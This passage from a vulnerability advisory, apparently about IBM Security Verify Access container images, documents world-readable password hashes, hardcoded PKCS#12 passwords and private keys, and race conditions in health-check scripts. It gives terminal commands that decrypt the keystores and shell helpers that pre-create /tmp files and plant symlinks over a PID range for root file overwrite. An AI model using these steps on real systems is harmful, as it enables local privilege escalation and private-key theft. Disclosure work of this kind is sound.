\n\nWhen extracting verify-access, we can find the `/etc/shadow.isam` file:\n\n kali-docker# cat ./698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/shadow.isam\n admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n www-data:*:14251:0:99999:7:::\n ivmgr:!!:19151:0:99999:7:::\n cluster::19151:0:99999:7:::\n pgresql:!!:19151:0:99999:7:::\n nfast:!!:19151:0:99999:7:::\n tivoli:!!:19151:0:99999:7:::\n\nWhen checking on the live system (verify-access), we can find these 3 previous files, 2 of which are world-readable:\n\n [root@container-01]# podman ps | grep 413823e2f7d1\n 413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n [root@container-01]#\n \n [root@container-01]# podman ps|grep 413823e2f7d1\n 413823e2f7d1 ibmcom/verify-access/verify-access/10.0.4.0:20220926.6 25 hours ago Up 25 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf /etc/shadow.isam /etc/admin.pwd\n -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n -rw-r--r-- 1 root root 305 Jun 8 13:43 /etc/shadow.isam\n -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n [root@container-01]#\n\nFurthermore, we can extract passwords from these files. 
The hash in `/etc/shadow.isam` seems to be hardcoded (`admin`):\n\n [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/shadow.isam\n admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n www-data:*:14251:0:99999:7:::\n ivmgr:!!:19151:0:99999:7:::\n cluster::19151:0:99999:7:::\n pgresql:!!:19151:0:99999:7:::\n nfast:!!:19151:0:99999:7:::\n tivoli:!!:19151:0:99999:7:::\n \n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/admin.pwd\n -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/admin.pwd\n [REDACTED]\n \n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf\n -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/wga_notifications.conf\n [...]\n sam_cluster.hvdb.driver_type = thin\n isam_cluster.hvdb.embedded = false\n isam_cluster.hvdb.port = 1536\n isam_cluster.hvdb.pwd = [REDACTED]\n isam_cluster.hvdb.secure = false\n [...]\n\n\nA local attacker can extract hashes from world-readable files and elevate their privileges. \n\nThe purpose of `/etc/shadow.isam` is unknown. 
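The world-readable-hash condition described above can be searched for directly. A sketch (the helper name is illustrative; the `$6$` marker matches SHA-512 crypt hashes such as the `admin` entry above):

```shell
# Audit sketch: list world-readable regular files directly under $1 that
# contain a SHA-512 crypt hash marker ("$6$"), as /etc/shadow.isam does.
find_world_readable_hashes() {
    find "$1" -maxdepth 1 -type f -perm -o=r -exec grep -l '\$6\$' {} +
}
```

Pointed at `/etc` inside the verify-access image, this would flag `/etc/shadow.isam`.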
\n\n\n\n## Details - Hardcoded PKCS#12 files\n\nIt was observed the Docker image verify-access contains hardcoded PKCS#12 files:\n\n- - /var/isam/cluster/sundry/odbc/ewallet.p12\n- - /var/pdweb/shared/keytab/lmi_trust_store.p12\n- - /var/pdweb/shared/keytab/embedded_ldap_keys.p12\n- - /var/pdweb/shared/keytab/rt_profile_keys.p12\n\nThe `/var/isam/cluster/sundry/odbc/ewallet.p12` file can be found inside the verify-access image:\n\n kali-docker# ls -la ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n -rw-r--r-- 1 5000 5000 736 Jun 8 01:32 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n \n kali-docker# sha256sum ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n 687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n\nWhen checking on the live system (verify-access), we can find this unchanged file:\n\n [root@container-01]# podman ps | grep 413823e2f7d1\n 413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 26 hours ago Up 26 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /var/isam/cluster/sundry/odbc/\n total 16\n drwxr-xr-x 2 www-data www-data 4096 Jun 8 13:43 . \n drwxr-xr-x 3 cluster cluster 4096 Jun 8 13:43 .. 
\n -rw-r--r-- 1 www-data www-data 781 Jun 8 13:32 cwallet.sso\n -rw-r--r-- 1 www-data www-data 0 Jun 8 13:32 cwallet.sso.lck\n -rw-r--r-- 1 www-data www-data 736 Jun 8 13:32 ewallet.p12\n -rw-r--r-- 1 www-data www-data 0 Jun 8 13:32 ewallet.p12.lck\n [root@container-01]# podman exec -it 413823e2f7d1 sha256sum /var/isam/cluster/sundry/odbc/ewallet.p12\n 687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5 /var/isam/cluster/sundry/odbc/ewallet.p12\n [root@container-01]#\n\nThis file is used by several programs, with a trivial password (`passw0rd`) to encrypt it:\n\nAssembly code of the function `authorSqlFuseFiles` found inside `mesa_config`, used to extract ewallet.p12:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nExtraction using OpenSSL:\n\n kali-docker# openssl pkcs12 -in ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12 -out /tmp/ewallet.test \n Enter Import Password: [passw0rd]\n kali-docker# cat /tmp/ewallet.test\n Bag Attributes\n localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 04 \n subject=C = us, O = ibm, CN = rhel66.home.com\n issuer=C = us, O = ibm, CN = rhel66.home.com\n -----BEGIN CERTIFICATE-----\n MIIB2TCCAUICAQAwDQYJKoZIhvcNAQEEBQAwNTELMAkGA1UEBhMCdXMxDDAKBgNV\n BAoTA2libTEYMBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMB4XDTE2MDYwNDE4MjAx\n N1oXDTI2MDYwMjE4MjAxN1owNTELMAkGA1UEBhMCdXMxDDAKBgNVBAoTA2libTEY\n MBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB\n iQKBgQC5awQOrQ/BlLYQ1dC0+e2NplzULT447UNrj8yaPqH0FeoqgLH29FzpVJV1\n IWzN06IGSUEeyAck7u7EUg1BK3eyfwO3o1qolrvRkm4Rsvg+yijUIr2aSV0Xz9oR\n 71C+YMHr1MtGi6Xn432+vPSc2AxQVBKCVj0rBGka6V9mwWDPewIDAQABMA0GCSqG\n SIb3DQEBBAUAA4GBAF9QlpGUC9QcxgI0B77xY0/2bNd3xBfS+hTbgyyoWRzH43so\n 1VG97F6g0rR6wvsAOTdr7kJn+t7sMyuhdJ2/TmZFATUL+6j9XpJH+7r+Ca4iIMB+\n 
ysi09PVz6ccrsgpD9SiYxQ4HMJ+YKBahPg3geEUIkratxB69qZy0uP5WSp64\n -----END CERTIFICATE-----\n kali-docker# openssl x509 -in /tmp/ewallet.test -text -noout \n Certificate:\n Data:\n Version: 1 (0x0)\n Serial Number: 0 (0x0)\n Signature Algorithm: md5WithRSAEncryption\n Issuer: C = us, O = ibm, CN = rhel66.home.com\n Validity\n Not Before: Jun 4 18:20:17 2016 GMT\n Not After : Jun 2 18:20:17 2026 GMT\n Subject: C = us, O = ibm, CN = rhel66.home.com\n Subject Public Key Info:\n Public Key Algorithm: rsaEncryption\n Public-Key: (1024 bit)\n Modulus:\n 00:b9:6b:04:0e:ad:0f:c1:94:b6:10:d5:d0:b4:f9:\n ed:8d:a6:5c:d4:2d:3e:38:ed:43:6b:8f:cc:9a:3e:\n a1:f4:15:ea:2a:80:b1:f6:f4:5c:e9:54:95:75:21:\n 6c:cd:d3:a2:06:49:41:1e:c8:07:24:ee:ee:c4:52:\n 0d:41:2b:77:b2:7f:03:b7:a3:5a:a8:96:bb:d1:92:\n 6e:11:b2:f8:3e:ca:28:d4:22:bd:9a:49:5d:17:cf:\n da:11:ef:50:be:60:c1:eb:d4:cb:46:8b:a5:e7:e3:\n 7d:be:bc:f4:9c:d8:0c:50:54:12:82:56:3d:2b:04:\n 69:1a:e9:5f:66:c1:60:cf:7b\n Exponent: 65537 (0x10001)\n Signature Algorithm: md5WithRSAEncryption\n Signature Value:\n 5f:50:96:91:94:0b:d4:1c:c6:02:34:07:be:f1:63:4f:f6:6c:\n d7:77:c4:17:d2:fa:14:db:83:2c:a8:59:1c:c7:e3:7b:28:d5:\n 51:bd:ec:5e:a0:d2:b4:7a:c2:fb:00:39:37:6b:ee:42:67:fa:\n de:ec:33:2b:a1:74:9d:bf:4e:66:45:01:35:0b:fb:a8:fd:5e:\n 92:47:fb:ba:fe:09:ae:22:20:c0:7e:ca:c8:b4:f4:f5:73:e9:\n c7:2b:b2:0a:43:f5:28:98:c5:0e:07:30:9f:98:28:16:a1:3e:\n 0d:e0:78:45:08:92:b6:ad:c4:1e:bd:a9:9c:b4:b8:fe:56:4a:\n 9e:b8\n\nThe other files have been decrypted using `IBM Crypto For C` and OpenSSL. 
\n\nThe `lmi_trust_store.p12` file in the verify-access image contains several CAs and will also include the hardcoded key for the `Isam CA` in a live instance (after configuration):\n\n kali-docker# file=ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/pdweb/shared/keytab/lmi_trust_store.p12\n kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw passwordpassword\n \n kali-docker# openssl pkcs12 -in /tmp/tmp.p12 -info -passin pass:passwordpassword\n MAC: sha1, Iteration 1024\n MAC length: 20, salt length: 8\n PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n Certificate bag\n Bag Attributes\n friendlyName: CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US\n localKeyID: 03 82 01 01 00 CB 9C 37 AA 48 13 12 0A FA DD 44 9C 4F 52 B0 F4 DF AE 04 F5 79 79 08 A3 24 18 FC 4B 2B 84 C0 2D B9 D5 C7 FE F4 C1 1F 58 CB B8 6D 9C 7A 74 E7 98 29 AB 11 B5 E3 70 A0 A1 CD 4C 88 99 93 8C 91 70 E2 AB 0F 1C BE 93 A9 FF 63 D5 E4 07 60 D3 A3 BF 9D 5B 09 F1 D5 8E E3 53 F4 8E 63 FA 3F A7 DB B4 66 DF 62 66 D6 D1 6E 41 8D F2 2D B5 EA 77 4A 9F 9D 58 E2 2B 59 C0 40 23 ED 2D 28 82 45 3E 79 54 92 26 98 E0 80 48 A8 37 EF F0 D6 79 60 16 DE AC E8 0E CD 6E AC 44 17 38 2F 49 DA E1 45 3E 2A B9 36 53 CF 3A 50 06 F7 2E E8 C4 57 49 6C 61 21 18 D5 04 AD 78 3C 2C 3A 80 6B A7 EB AF 15 14 E9 D8 89 C1 B9 38 6C E2 91 6C 8A FF 64 B9 77 25 57 30 C0 1B 24 A3 E1 DC E9 DF 47 7C B5 B4 24 08 05 30 EC 2D BD 0B BF 45 BF 50 B9 A9 F3 EB 98 01 12 AD C8 88 C6 98 34 5F 8D 0A 3C C6 E9 D5 95 95 6D DE \n 2.16.840.1.113894.746875.1.1: \u003cUnsupported tag 6\u003e\n subject=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = 
DigiCert Global Root CA\n issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA\n -----BEGIN CERTIFICATE-----\n MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh\n MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3\n d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD\n QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT\n MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j\n b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG\n 9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB\n CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97\n nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt\n 43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P\n T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4\n gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO\n BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR\n TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw\n DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr\n hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg\n 06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF\n PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls\n YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk\n CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4=\n -----END CERTIFICATE-----\n Certificate bag\n Bag Attributes\n friendlyName: CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n [...]\n\nWhen auditing live installations, the decrypted `lmi_trust_store.p12` file will contain the private key of the isam CA. 
\n\n kali% openssl x509 -in crt.pem -text -noout -modulus\n Certificate:\n Data:\n Version: 3 (0x2)\n Serial Number: 14004578023842938\n Signature Algorithm: sha256WithRSAEncryption\n Issuer: C = us, O = ibm, CN = isam\n Validity\n Not Before: Sep 19 07:01:51 2022 GMT\n Not After : Sep 17 07:01:51 2032 GMT\n Subject: C = us, O = ibm, CN = isam\n [...]\n Modulus=C8B3[REDACTED]\n \n kali% openssl rsa -in crt.key -modulus \n Enter pass phrase for crt.key:\n Modulus=C8B3[REDACTED]\n writing RSA key\n -----BEGIN PRIVATE KEY-----\n [REDACTED]\n -----END PRIVATE KEY-----\n\nIt is also possible to decrypt the `embedded_ldap_keys.p12` file:\n\n kali-docker# openssl pkcs12 -in embedded_ldap_keys.p12 -info -passin pass:passwordpassword \n MAC: sha1, Iteration 1024 \n MAC length: 20, salt length: 8\n PKCS7 Data\n Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 5\n Bag Attributes\n friendlyName: server\n localKeyID: [REDACTED]\n Key Attributes: \u003cNo Attributes\u003e\n Enter PEM pass phrase: [password]\n Verifying - Enter PEM pass phrase: [password]\n -----BEGIN ENCRYPTED PRIVATE KEY-----\n [REDACTED]\n -----END ENCRYPTED PRIVATE KEY-----\n PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n Certificate bag\n Bag Attributes\n friendlyName: server\n localKeyID: [REDACTED]\n subject=C = us, O = ibm, CN = isam\n issuer=C = us, O = ibm, CN = isam\n -----BEGIN CERTIFICATE-----\n [REDACTED]\n -----END CERTIFICATE-----\n kali-docker#\n\nUsing a dynamic analysis, it was confirmed that several private keys are included in the snapshot images and used at least by OpenLDAP. The .p12 files can be decrypted using `IBM Crypto For C` and OpenSSL. \n\n kali-docker# pwd \n /home/user/snapshots/_a22547c15c88-verify-access-runtime_10.0.4.0.tar-default.snapshot/var/pdweb/shared/keytab\n kali-docker# ls -la\n total 492\n drwxr-x--- 2 root root 4096 Oct 18 05:13 . \n drwxr-x--- 16 root root 4096 Sep 20 03:01 .. 
\n -rw-r----- 1 root root 2952 Sep 20 03:01 embedded_ldap_keys.p12\n -rw-r----- 1 root root 193 Jun 8 01:31 embedded_ldap_keys.sth\n -rw-r----- 1 root root 47630 Sep 20 03:09 lmi_trust_store.p12\n -rw-r----- 1 root root 193 Jun 8 01:31 lmi_trust_store.sth\n -rw-r----- 1 root root 109313 Sep 20 03:17 rt_profile_keys.p12\n -rw-r----- 1 root root 193 Jun 8 01:31 rt_profile_keys.sth\n [...]\n\n\n\n## Details - Incorrect permissions in verify-access-dsc (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access-dsc uses insecure temporary files to store sensitive information. \n\nThe `/usr/sbin/bootstrap.sh` script will generate temporary files using the default umask (`022`). \n\nIn the `build_health_check_config()` function found inside the `/usr/sbin/bootstrap.sh` script (executed when the instance starts), we can see that several files are generated:\n\n- - /tmp/health_check.p12\n- - /var/dsc/.health/port.txt\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n[code:shell]\n 65 #############################################################################\n 66 # Construct the health check configuration information. This will include\n 67 # the port and client certificate information. \n 68 \n 69 build_health_check_config()\n 70 {\n 71 if [ -z \"$INSTANCE\" ] ; then\n 72 INSTANCE=1\n 73 fi\n 74 \n 75 conf=/var/dsc/etc/dsc.conf.${INSTANCE}\n 76 \n 77 if [ ! -f ${conf} ] ; then\n 78 Echo 973 \"${INSTANCE}\"\n 79 exit 1\n 80 fi\n 81 \n 82 #\n 83 # Determine the port which is to be used. \n 84 #\n 85 \n 86 port=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n 87 dsess-server ssl-listen-port`\n 88 \n 89 mkdir -p /var/dsc/.health\n 90 \n 91 echo $port \u003e /var/dsc/.health/port.txt\n 92 \n 93 #\n 94 # Extract the client certificate which is used to communicate with the\n 95 # server. 
\n 96 #\n 97 \n 98 cert_file=/var/dsc/.health/health_check.pem\n 99 \n100 tmp_p12=/tmp/health_check.p12\n101 tmp_pwd=health_check\n102 \n103 # Work out the name of the key file which is being used. \n104 key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n105 dsess-server ssl-keyfile`\n106 \n107 # Export the key into a key database type which is supported\n108 # by OpenSSL. \n109 gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n110 -target $tmp_p12 -target_pw $tmp_pwd\n111 \n112 # Convert the key into something that curl understands. \n113 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n114 -passin pass:$tmp_pwd 2\u003e/dev/null\n115 \n116 # Tidy up. \n117 rm -f $tmp_p12\n118 }\n119\n[...]\n176 #\n177 # Extract the health check information. \n178 #\n179 \n180 build_health_check_config\n[/code]\n\nThe temporary file `/tmp/health_check.p12` contains the private keys of the dsc server and the dsc client. This key file is stored using the `644` permissions allowing any local attacker to extract these keys when the Docker image starts. \n\nFurthermore, the password of the certificate file is hardcoded (to `health_check`, on line 101). \n\nWhen checking the files generated by this script, we can confirm the files are world-readable. For example, for the `/var/dsc/.health/port.txt` file, the permissions are 644:\n\n [isam@verify-access-dsc /]$ ls -la /var/dsc/.health/\n total 28\n drwxr-xr-x 2 isam isam 4096 Oct 4 09:07 . \n drwxrwx--- 1 isam root 4096 Oct 4 09:07 .. \n -rw------- 1 isam isam 9268 Oct 4 09:07 health_check.pem\n -rw-r--r-- 1 isam isam 5 Oct 4 09:07 port.txt\n [isam@verify-access-dsc /]$\n\n\nThere is a race condition in the `/usr/sbin/bootstrap.sh` script allowing a local attacker with access to the verify-access-dsc instance to extract the private keys of the dsc server and the dsc client when the Docker image starts. 
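Because the export target `/tmp/health_check.p12` has a fixed, predictable name, the pre-creation step needs only two commands run before the instance boots (a sketch; the helper name is illustrative):

```shell
# The export target /tmp/health_check.p12 has a fixed name, so a local
# user can create it before bootstrap.sh runs; the script overwrites the
# content as root, but the attacker keeps ownership of the file and can
# read the exported PKCS#12 afterwards (password: health_check).
prefill_export_target() {
    : > "$1"        # create an empty file owned by the current user
    chmod 644 "$1"  # world-readable, matching the default umask
}
prefill_export_target /tmp/health_check.p12
```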
\n\nThe filename is predictable, allowing a local attacker to create the destination file before the script is executed. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing them to extract the private keys. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Insecure health_check.sh script in verify-access (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access regularly runs the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store sensitive information. Since this script uses the default umask (`022`), an attacker can exploit a race condition (between the lines 91 and 95) to extract the private keys of the dsc server and the dsc clients. \n\nThe `/tmp/health_check.pem` output file will also be created containing the private keys in clear-text (in line 91), allowing an attacker to extract these private keys:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n[...]\n65 cert_file=/tmp/health_check.pem\n66 \n67 trap \"rm -f $result_file $error_file $hdr_file\" EXIT\n68 \n69 # The following function will extract a key which can be used to authenticate\n70 # to the DSC. \n71 \n72 extract_dsc_key()\n73 {\n74 if [ ! -f $cert_file ] ; then\n75 tmp_p12=/tmp/health_check.p12.$$\n76 tmp_pwd=health_check\n77 \n78 # Work out the name of the DSC configuration file. \n79 conf_file=`mesa_config wga.ftype dir dsc.conf -production`\n80 \n81 # Work out the name of the key file which is being used. \n82 key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf_file getentry \\\n83 dsess-server ssl-keyfile`\n84 \n85 # Export the key into a key database type which is supported\n86 # by OpenSSL. 
\n87 gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n88 -target $tmp_p12 -target_pw $tmp_pwd\n89 \n90 # Convert the key into something that curl understands. \n91 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n92 -passin pass:$tmp_pwd 2\u003e/dev/null\n93 \n94 # Tidy up. \n95 rm -f $tmp_p12\n96 fi\n97 }\n[...]\n[/code]\n\nThe file `/tmp/health_check.p12.$$` (`$$` corresponding to the local PID) will be generated with the password `health_check` and will contain the private keys of the dsc client and the dsc server. This file will be world-readable. Then the file will be erased. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to extract the private keys of the dsc server and the dsc client. \n\nThe filename is predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing extracting the private keys. \n\nThere is also a leak of private keys in the world-readable file `/tmp/health_check.pem`. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)\n\nIt was observed that the Docker image verify-access regularly runs the script `/usr/sbin/health_check.sh`. \n\nThis script uses curl, without checking the remote SSL certificate:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n190 #\n191 # Make the curl request. \n192 #\n193 \n194 eval curl --insecure --output $result_file --silent --show-error \\\n195 -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n196\n[/code]\n\nThe eval instruction does not seem exploitable. 
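For comparison, the same local probe can validate the server certificate instead of disabling checks with `--insecure`. A sketch, assuming a CA bundle provisioned at an illustrative path (not IBM's actual layout):

```shell
# Same local probe without --insecure: verification is pinned to a known
# CA bundle instead of being disabled. /var/pdweb/shared/keytab/ca.pem is
# an assumed path used for illustration only.
health_probe() {
    port=$1
    curl --cacert /var/pdweb/shared/keytab/ca.pem --silent --show-error \
         --output /dev/null "https://127.0.0.1:$port"
}
```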
\n\nThis script uses 2 temporary files to store the standard output (stdout) and the error output (stderr) of the curl command: an attacker can exploit these 2 temporary files to overwrite any file in the filesystem using pre-generated symbolic links inside `/tmp`:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n 62 result_file=/tmp/health_check.out.$$\n 63 error_file=/tmp/health_check.err.$$\n[...]\n194 eval curl --insecure --output $result_file --silent --show-error \\\n195 -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n[/code]\n\n\nThe `/tmp/health_check.out.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe script trusts any insecure HTTPS server, due to the use of the `--insecure` flag in curl. \n\nThere are two uses of insecure files in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to overwrite any file as root - it is possible to get a Local Privilege Escalation as root. \n\nThe filenames are predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination files will be overwritten by the `/usr/sbin/health_check.sh` script. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)\n\nIt was observed that the Docker image verify-access-dsc regularly runs the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store errors: an attacker can exploit a race condition to overwrite any file in the filesystem using a pre-generated symbolic link. 
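The pre-generated-symlink step can be sketched as follows (the target file, PID window, and helper name are all illustrative; future PIDs can only be guessed, so an attacker would seed a range of candidates):

```shell
# Seed a directory with health_check.err.<pid> symlinks covering a window
# of future PIDs; when the script later redirects curl's stderr as root,
# the write follows the attacker's link. dir, target, start and count are
# parameters so the sketch stays self-contained.
prefill_err_symlinks() {
    dir=$1; target=$2; start=$3; count=$4
    i=0
    while [ "$i" -lt "$count" ]; do
        ln -sf "$target" "$dir/health_check.err.$((start + i))"
        i=$((i + 1))
    done
}
```

In an attack, `dir` would be `/tmp` and `target` whatever root-owned file the attacker wants clobbered.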
\n\nFurthermore, the script uses insecure options for curl on line 73 (`--insecure`) - the SSL certificate of the remote host will not be validated:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n62 #\n63 # Test access to the server as this will govern whether we are healthy or\n64 # not. \n65 #\n66 \n67 error_file=/tmp/health_check.err.$$\n68 \n69 trap \"rm -f $error_file\" EXIT\n70 \n71 ping_body=\u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/X MLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n72 \n73 curl -s -o /dev/null --show-error --insecure --cert $cert_file -X POST \\\n74 -H \u0027SOAPAction: \"ping\"\u0027 \\\n75 --data \"$ping_body\" \\\n76 https://127.0.0.1:$port 2\u003e $error_file\n77 \n78 if [ $? -ne 0 ] ; then\n79 #\n80 # We don\u0027t know for sure yet whether the DSC is alive or not because it\n81 # could be passive (only a single DSC is active in an environment at any\n82 # one time). So, we also need to try a simple SSL connection before we\n83 # return that the server is actually unhealthy. We could have simply\n84 # avoided the initial curl call, but by only performing the SSL connection\n85 # test when the DSC is passive we avoid SSL error messages being displayed\n86 # on the console. \n87 #\n88 \n89 openssl s_client -connect 127.0.0.1:$port 2\u003e\u00261 | grep -q CONNECTED\n90 \n91 if [ $? 
